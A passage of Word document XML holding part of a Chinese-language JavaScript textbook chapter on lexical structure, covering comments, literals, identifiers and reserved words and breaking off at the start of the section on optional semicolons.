        <w:t>。在文本编辑器中，这两种编码的显示结果一模一样，但它们的二进制编码表示是不一样的，在计算机里也不相等。</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>标准为所有字符定义了一个首选的编码格式，并给出了一个标准化的处理方式将文本转换为一种适合比较的标准格式，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会认为它正在解析的程序代码已经是这种标准格式，</w:t>
      </w:r>
      <w:r>
        <w:t>不会再对其标识符、字符串或正则表达式作标准化处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="2_2_Zhu_Shi_"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持两种格式的注释。在行尾</w:t>
      </w:r>
      <w:r>
        <w:t>“//”</w:t>
      </w:r>
      <w:r>
        <w:t>之后的文本都会被</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>当做注释忽略掉的。此外，</w:t>
      </w:r>
      <w:r>
        <w:t>“/*”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“*/”</w:t>
      </w:r>
      <w:r>
        <w:t>之间的文本也会当做注释，这种注释可以跨行书写，但不能有嵌套的注释。下面都是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是单行注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里是一段注释</w:t>
      </w:r>
      <w:r>
        <w:t>*///</w:t>
      </w:r>
      <w:r>
        <w:t>这里是另一段注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这又是一段注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这里的注释可以连写多行</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33" w:name="2_3_Zhi_Jie_Liang_"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　直接量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所谓直接量（</w:t>
      </w:r>
      <w:r>
        <w:t>literal</w:t>
      </w:r>
      <w:r>
        <w:t>），就是程序中直接使用的数据值。下面列出的都是直接量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>12//</w:t>
      </w:r>
      <w:r>
        <w:t>数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1.2//</w:t>
      </w:r>
      <w:r>
        <w:t>小数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hello world"//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'Hi'//</w:t>
      </w:r>
      <w:r>
        <w:t>另一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>true//</w:t>
      </w:r>
      <w:r>
        <w:t>布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false//</w:t>
      </w:r>
      <w:r>
        <w:t>另一个布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/javascript/gi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式直接量（用做模式匹配）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>null//</w:t>
      </w:r>
      <w:r>
        <w:t>空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章会详细讲解数字和字符串直接量。正则表达式直接量会在第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章讲解。更多复杂的表达方式（参见</w:t>
      </w:r>
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）可以写成数组或对象直接量，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{x:1,y:2}//</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,3,4,5]//</w:t>
      </w:r>
      <w:r>
        <w:t>数</w:t>
      </w:r>
      <w:r>
        <w:t>组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="2_4_Biao_Shi_Fu_He_Bao_Liu_Zi_"/>
      <w:r>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　标识符和保留字</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>标识符就是一个名字。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，标识符用来对变量和函数进行命名，或者用做</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中某些循环语句中的跳转位置的标记。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标识符必须以字母、下划线（</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>）或美元符（</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>）开始。后续的字符可以是字母、数字、下划线或美元符（数字是不允许作为首字符出现的，以便</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以轻易区分开标识符和数字）。下面是合法的标识符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>my_variable_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>v13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>_dummy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$str</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>出于可移植性和易于书写的考虑，通常我们只使用</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母和数字来书写标识符。然而需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>允许标识符中出现</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符全集中的字母和数字。（从技术上讲，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准也允许在标识符的首字符后面出现</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符集中的</w:t>
      </w:r>
      <w:r>
        <w:t>Mn</w:t>
      </w:r>
      <w:r>
        <w:t>类、</w:t>
      </w:r>
      <w:r>
        <w:t>Mc</w:t>
      </w:r>
      <w:r>
        <w:t>类和</w:t>
      </w:r>
      <w:r>
        <w:t>Pc</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>）。由此，程序员也可以使用非英语语言或数学符号来书写标识符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sí=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>varπ=3.14;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和其他任何编程语言一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>保留了一些标识符为自己所用。这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>保留字</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>不能用做普通的标识符，</w:t>
      </w:r>
      <w:r>
        <w:t>下面会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="Bao_Liu_Zi_"/>
      <w:r>
        <w:t>保留字</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>把一些标识符拿出来用做自己的关键字。因此，就</w:t>
      </w:r>
      <w:r>
        <w:t>不能再在程序中</w:t>
      </w:r>
      <w:r>
        <w:t>把这些关键字用做标识符了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B0694" w:rsidRDefault="005B0694">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="129D11C5" wp14:editId="2EBF7C39">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>44450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5675630" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3" name="00003.jpeg" descr="0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3.jpeg" descr="00003.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5675630" cy="1508760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B0694" w:rsidRPr="005B0694" w:rsidRDefault="005B0694">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A817C9" w:rsidRPr="00A817C9" w:rsidRDefault="00923A94" w:rsidP="00A817C9">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样保留了一些关键字，这些关键字在当前的语言版本中并没有使用，但在未来版本中可能会用到。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>保留了这些关键字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2303252" cy="142335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="00004.jpeg" descr="000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00004.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2303252" cy="142335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此外，下面这些关键字在普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中是合法的，但是在严格模式下是保留字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>implements let private public yield</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>interface package protected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>严格模式同样对下面的标识符的使用做了严格限制，它们并不完全是保留字，但不能用做变量名、函数名或参数名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>arguments eval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的所有关键字都列为自己的保留字，尽管这些保留字在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中放宽了限制，但如果你希望代码能在基于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>实现的解释器上运行的话，应当避免使用这些关键字作为标识符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3278037" cy="728932"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5" name="00005.jpeg" descr="000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00005.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3278037" cy="728932"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>预定义了很多全局变量和函数，应当避免把它们的</w:t>
      </w:r>
      <w:r>
        <w:t>名字用做变量名和函数名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923A94" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923A94" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923A94" w:rsidRDefault="00923A94" w:rsidP="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94" w:rsidP="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="36" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的具体实现可能定义独有的全局变量和函数，每一种特定的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运行环境（客户端、服务器端等）都有自己的一个全局属性列表，这一点是需要牢记的。参照第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象来了解客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的全局变量和函数列表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="2_5_Ke_Xuan_De_Fen_Hao_"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可选的分号</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和其他许多编程语言一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>使用分号（</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>）将语句（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章）分隔开。这对增强代码的可读性和整洁性是非常重要的：缺少分隔符，一条语句的结束就成了下一条语句的开始，反之亦然。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，如果语句各自独占</w:t>
